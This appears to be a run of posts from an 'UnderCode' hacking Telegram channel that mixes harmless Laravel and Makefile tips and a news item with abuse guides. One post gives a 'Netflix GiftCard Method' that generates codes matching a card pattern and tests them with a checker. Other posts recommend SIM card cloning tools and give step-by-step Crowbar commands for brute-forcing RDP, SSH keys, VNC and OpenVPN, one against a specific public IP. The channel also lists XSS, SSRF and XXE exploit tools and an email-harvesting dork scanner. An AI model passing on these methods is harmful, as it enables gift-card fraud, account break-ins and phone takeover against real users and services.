▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Netflix GiftCard Method✅

1) Go to : https://www.randomcodegenerator.com/en/generate-codes

2) Click Generate Using Pattern

3) Put this Pattern : LEQ9X999999

4) Untick the Exclude Characters Box

5) Generate Some Codes You can generate in the site [ but max is 1k ] , Or export to .txt File

6)choose the netflix checker :

https://t.me/UnderCodeTesting/9401

E N J O Y ❤️👍🏻
(not by us)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WEB VULNERABILITIES SCANN & ANALYSE FREE CODES :

https://github.com/neuroo/grabber

https://subgraph.com/vega/

https://github.com/zaproxy/zaproxy

http://wapiti.sourceforge.net/

http://w3af.org/

https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

http://code.google.com/p/skipfish/

https://github.com/sqlmapproject/sqlmap

http://sourceforge.net/projects/grendel/

http://code.google.com/p/wfuzz/

http://xss.codeplex.com/

http://www.arachni-scanner.com/

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Creating a Helpers File :
#protips

1) Problem
You have common functions you want available for every request.

But you don’t want to dirty up app\start\global.php with a bunch of functions.

2) Solution
Create a helpers.php file.


> First create the file app/helpers.php.

<?php
// My common functions
function somethingOrOther()
{
return (mtrand(1,2) == 1) ? 'something' : 'other';
}
?>

🦑 Then either load it at the bottom of app\start\global.php as follows :

// at the bottom of the file
require apppath().'/helpers.php';
Or change your composer.json file and dump the autoloader.

{
"autoload": {
"files":
"app/helpers.php"

}
}

3) $ composer dump-auto

4) some suggestions.

>app/helpers.php – For general purpose functions.
>app/composers.php – To initialize all your View composers in one place.
>app/listeners.php – To set up all your event listeners in one place.
>app/observers.php – Or, if you like observers better than listeners use this filename for event listeners.

> It’s really up to you and the demands of your application

#protips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->

R E Q U I R E M E N T S :

1) sudo apt-get install php5-curl

2) INSTALLING LIB CLI: sudo apt-get install php5-cli

3) INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/googleinurl/SCANNER-INURLBR.git

2) cd SCANNER-INURLBR

3) $chmod +x inurlbr.php

4) Executar: ./inurlbr.php

5) to get a list of basic options and switches use:

php inurlbr.php -h

6) To get a list of all options and switches use:

php inurlbr.php --help

E N J O Y ❤️👍🏻
U S E F O R L E A R N
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SIMCARD CLONING TOOLS :

 http://mister-sim.software.informer.com/

> https://www.dekart.com/products/card_management/sim_explorer/

> https://www.amazon.com/Cellphone-Reader-Cloner-Writer-Backup/dp/B00ZWNGPX6/

> https://ssl-download.cnet.com/MagicSIM/3000-2094_4-10601728.html

>  http://www.mobiledit.com/sim-cloning/

—MUCH MORE SIM CARD CLONING TOOLS BUT THOSE VERIFIED BEST TOOLS _

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NSA and FBI jointly expose the Linux malicious program Drvorub developed in Russia
#News

> The US National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) recently issued a press release that jointly disclosed the malicious software used by Russian military hackers in cyber espionage. In the detailed report disclosed on Thursday, hackers working for the Special Service Center of the 85th Army of the General Intelligence Service of the Russian General Staff (Unit 26165) used a malicious program called "Drovorub" to launch attacks specifically against Linux systems.

> These hackers are also known as APT28 or Fancy Bear. They invaded the Democratic National Committee in 2016 and often attacked defense, government, aerospace and other fields.

Although the alert did not contain specific details about the victims of "Drovorub", US officials said that they had issued alerts to multiple agencies this Thursday to raise awareness of hacking and vulnerabilities in the defense sector.

The National Security Agency and the FBI stated in the report: "The malware has posed a threat because Linux systems are widely used in the US national security system, the Department of Defense and the National Defense Industry Base."

#news
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑hack.chat is a minimal, distraction-free, accountless, logless, disappearing chat service which is easily deployable as your own service. The current client comes bundled with LaTeX rendering provided by KaTeX and code syntax highlighting provided by highlight.js.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Clone the repository: git clone https://github.com/hack-chat/main.git

2) Change the directory: cd main

Install the dependencies: npm install

3) Launch: npm start

4) If you change the websocketPort option during the config setup then these changes will need to be reflected on line 60 of client.js.

R E Q U I R E M E N T S :

node.js 8.10.0 or higher

npm 5.7.1 or higher


@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOOLS REQUIRED FOR PENTESTING IN ANY LINUX OS :

pscan examiner ht
flawfinder srm driftnet
rats nwipe binwalk
ddrescue firstaidkit-gui scalpel
gparted xmount pdfcrack
testdisk dc3dd wipe
foremost afftools safecopy
sectool-gui scanmem hfsutils
unhide sleuthkit cmospwd
examiner macchanger secuirty-menus
srm ngrep nc6
nwipe ntfs-3g mc
firstaidkit-gui ntfsprogs screen
net-snmp pcapdiff openvas-scanner
hexedit netsed rkhunter
irssi dnstop labrea
powertop sslstrip nebula
mutt bonesi tripwire
nano proxychains prelude-lml
vim-enhanced prewikka iftop
wget prelude-manager scamper
yum-utils picviz-gui iptraf-ng
mcabber telnet iperf
firstaidkit-plugin-all onenssh nethogs
vnstat dnstracer uperf
aircrack-ng chkrootkit nload
airsnort aide ntop
kismet pads trafshow
weplab cowpatty wavemon

@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UTILITIES/TOOLS & CHECKERS & tutorials 2020 :

| Utility/TOOLBOX | [CyberChef](https://github.com/gchq/CyberChef) | The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis | ![]
(https://img.shields.io/github/stars/gchq/CyberChef) |  |

| Utility/URL | [anew](https://github.com/tomnomnom/anew) | A tool for adding new lines to files, skipping duplicates |  |  |

| Utility/URL | [burl](https://github.com/tomnomnom/burl)

| A Broken-URL Checker |  |  |


| Utility/URL | [cf-check](https://github.com/dwisiswant0/cf-check) | Cloudflare Checker written in Go |  |  |


| Utility/URL | [gau](https://github.com/lc/gau) | Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. |  |  |


| Utility/URL | [hacks](https://github.com/tomnomnom/hacks/tree/master/anti-burl) | remove bad urls |  |  |


| Utility/URL | [qsreplace](https://github.com/tomnomnom/qsreplace) | Accept URLs on stdin, replace all query string values with a user-supplied value |  |  |


| Utility/URL | [unfurl](https://github.com/tomnomnom/unfurl) | Pull out bits of URLs provided on stdin |  |  |


| Utility/URL | [urlprobe](https://github.com/1ndianl33t/urlprobe) | Urls status code & content length checker |  |  |


| Utility/VULN | [Gopherus](https://github.com/tarunkant/Gopherus) | This tool generates gopher link for exploiting SSRF and gaining RCE in various servers |  |  |


| Utility/VULN | [hinject](https://github.com/dwisiswant0/hinject) | Host Header Injection Checker |  |  |


| Utility/VULN | [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) | A tool for embedding XXE/XML exploits into different filetypes |  |  |


| Utility/VULN | [pentest-tools](https://github.com/gwen001/pentest-tools) | Custom pentesting tools |

E N J O Y ❤️👍🏻
use for learn
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME NEW XSS UTILITIES/TOOLS & TUTORIALS :

| Scanner/XSS | [domdig](https://github.com/fcavallarin/domdig) | DOM XSS scanner for Single Page Applications |  |  |


| Scanner/XSS | [ezXSS](https://github.com/ssl/ezXSS) | ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. |  |  |


| Scanner/XSS | [findom-xss](https://github.com/dwisiswant0/findom-xss) | A fast DOM based XSS vulnerability scanner with simplicity. |  |  |


| Scanner/XSS | [xsser](https://github.com/epsylon/xsser) | Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. |  |  |


| Utility/BRIDGE | [Atlas](https://github.com/m4ll0k/Atlas) |

@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Makefile - Macros #NewTips
Program make allows you to use macros, which are similar to variables. Macros are defined in the Makefile as pairs =. An example was shown below -

MACROS = -me
PSROFF = groff -Tps
DITROFF = groff -Tdvi
CFLAGS = -O -systype bsd43
LIBS = "-lncurses -lm -lsdl"
MYFACE = ": *)"
Special macros

1) Before executing any command, certain special macros are predefined in the target ruleset -

$ @ Is the name of the file to create.

$? these are the names of the changed dependents.

$ @ Is the name of the file to create.

$? these are the names of the changed dependents.

2) For example, we can use the rule like this:

hello : main . cpp hello . cpp factorial . cpp
$ ( CC ) $ ( CFLAGS ) $ ? $ ( LDFLAGS ) - o $ @

3) Alternatively :

hello : main . cpp hello . cpp factorial . cpp
$ ( CC ) $ ( CFLAGS ) $ @ . cpp $ ( LDFLAGS ) - o $ @
In this example, $ @ represents hello and $? or $ @. cpp picks up all modified source files.

4) There are two other special macros used in implicit rules. They -

$ <name of the linked file that invoked the action.

$ * prefix common to target and dependent files.

$ <name of the linked file that invoked the action.

$ * prefix common to target and dependent files.

5) A general implicit rule is to create .o (object) files from .cpp (source files).

... cpp . o :
$ ( CC ) $ ( CFLAGS ) - c $ <

Alternatively :

... cpp . o :
$ ( CC ) $ ( CFLAGS ) - c $ *. c

🦑Defining custom suffix rules in the Makefile :

1) Make can automatically create the file using cc -c for the corresponding .c file. These rules are built into make , and you can take advantage of this to shorten your Makefile. If you only list the .h files in the dependency line of the Makefile that the current target depends on, make knows that the corresponding .cfile is already required. You don't need to include the command for the compiler.

2) This further reduces the Makefile as shown below -

OBJECTS = main.o hello.o factorial.o
hello: $ (OBJECTS)
cc $ (OBJECTS) -o hello
hellp.o: functions.h

main.o: functions.h
factorial.o: functions.h

3) Make uses a special target named .SUFFIXES, which allows you to define your own suffixes. For example, refer to the dependency line given below -

.SUFFIXES: .foo .bar
It tells make that you will use these special suffixes to create your own rules.

4) Just as make already knows how to make a .o file from a .c file , you can define rules like this:

.foo.bar:
tr '[AZ] [az]' '[NZ] [AM] [nz] [am]' <$ <> $ @
.co:
$ (CC) $ (CFLAGS) -c $ <

5) The first rule allows you to create a .bar file from a .foo file . This basically encrypts the file. The second rule is the default rule used by make to create an .o file from a .c file .


@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIFI ADAPTERS SPECIAL FOR WIFI HACKING-KALI-PARROT :

Alfa AWUS1900 (chipset: Realtek RTL8814AU)

Alfa AWUS036ACH (chipset: Realtek RTL8812AU)

Alfa AWUS036AC (chipset: Realtek RTL8812AU)

TRENDnet TEW-809UB (chipset: Realtek RTL8814AU)

ASUS USB-AC68 (chipset: Realtek RTL8814AU)

ASUS USB-AC56 (chipset: Realtek RTL8812AU)

TP-LINK Archer T9UH (chipset: Realtek RTL8814AU)

TP-LINK Archer T4UH (rev V2, chipset: Realtek RTL8812AU)

TP-LINK Archer T4U (rev V3, chipset: Realtek RTL8812AU)

D-Link DWA-192 (chipset: Realtek RTL8814AU)

D-Link DWA-182 (rev C, chipset: Realtek RTL8812AU)

Edimax AC600 USB (chipset: Realtek RTL8811AU)

Netis WF2190 (chipset: Realtek RTL8812AU)

Tenda U12 (chipset: Realtek RTL8812AU)

ZyXEL NWD6605 (chipset: Realtek RTL8812AU)


@undercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 NEW UPDATE Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute force, Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests, to be used to attack other SSH servers.

F E A T U R E S :

-OpenVPN (-b openvpn)

-Remote Desktop Protocol (RDP) with NLA support (-b rdp)

-SSH private key authentication (-b sshkey)

-VNC key authentication (-b vpn)

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Kali Linux users can do

# sudo apt install -y crowbar
Else if you wish to install from source, install all the dependencies:

2) Debain 9/10+ & Kali Rolling

# sudo apt install -y nmap openvpn freerdp2-x11 tigervnc-viewer python3 python3-pip

3) Debain 7/8 & Kali 1/2

# sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer

4) Then get latest version from GitHub:

- git clone https://github.com/galkan/crowbar
- cd crowbar/
- pip3 install -r requirements.txt

5) Brute Forcing - Remote Desktop Protocol (RDP)
Below are a few examples of attacking RDP using Crowbar.

RDP brute forcing a single IP address using a single username and a single password:

# ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456

6) RDP brute forcing a single IP address using username list file and a single password:

# ./crowbar.py -b rdp -s 192.168.2.211/32 -U ~/Desktop/userlist -c passw0rd

7) RDP brute forcing a single IP address using a single username and a password list:

# ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist

8) RDP brute forcing a subnet using a username list and a password list in discovery mode:

# ./crowbar.py -b rdp -s 192.168.2.0/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d

9) Brute Forcing - SSH Private Keys
Below are a few examples which you have using Crowbar.

10) SSH key brute force attempt to a single IP address using a single username and a single private SSH key:

# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/id_rsa

11) SSH key brute force attempt to a single IP address using a single username and all the SSH keys in a folder:

# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/

12) SSH key brute force attempt to a subnet using a single username and all the SSH keys in a folder in discovery mode:

# ./crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k ~/.ssh/ -d

13) Brute Forcing - VNC
Below is an example of attacking a VNC service using Crowbar.

VNC brute force attempt to a single IP address using a password file with specified port number:

# ./crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k ~/.vnc/passwd

14) Below is an example of attacking OpenVPN using Crowbar :

OpenVPN brute force attempt to a single IP address using a configuration file, a single username and a single password with specified port number and optional certificate file. Doesn't matter if its TCP or UDP:

# grep remote ~/Desktop/vpnbook.ovpn
remote vpn.example.com 1194 udp
# host vpn.example.com | awk '{print $1}'
198.7.62.204
# grep '^auth-user-pass' ~/Desktop/vpnbook.ovpn
# ./crowbar.py -b openvpn -s 198.7.62.204/32 -p 1194 -m ~/Desktop/vpnbook.ovpn -k ~/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Laravel: How to redirect from controller to named route with params in URL :

1) Problem
What would be the proper way to call a named route from my Laravel controller, but be able to include the parameters (such as the GET parameters, where I can pass an ID) ?

2) Solution
In Laravel, you can use the helper methods which is really super helpful and allows you to pass as many parameters as you defined in your route such as:

 'TestingController@fakeMethod')->name('route.name');
return redirect()->route('route.name', [
    'id' => 1,
    'name' => 'fake param'
]);

#FastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁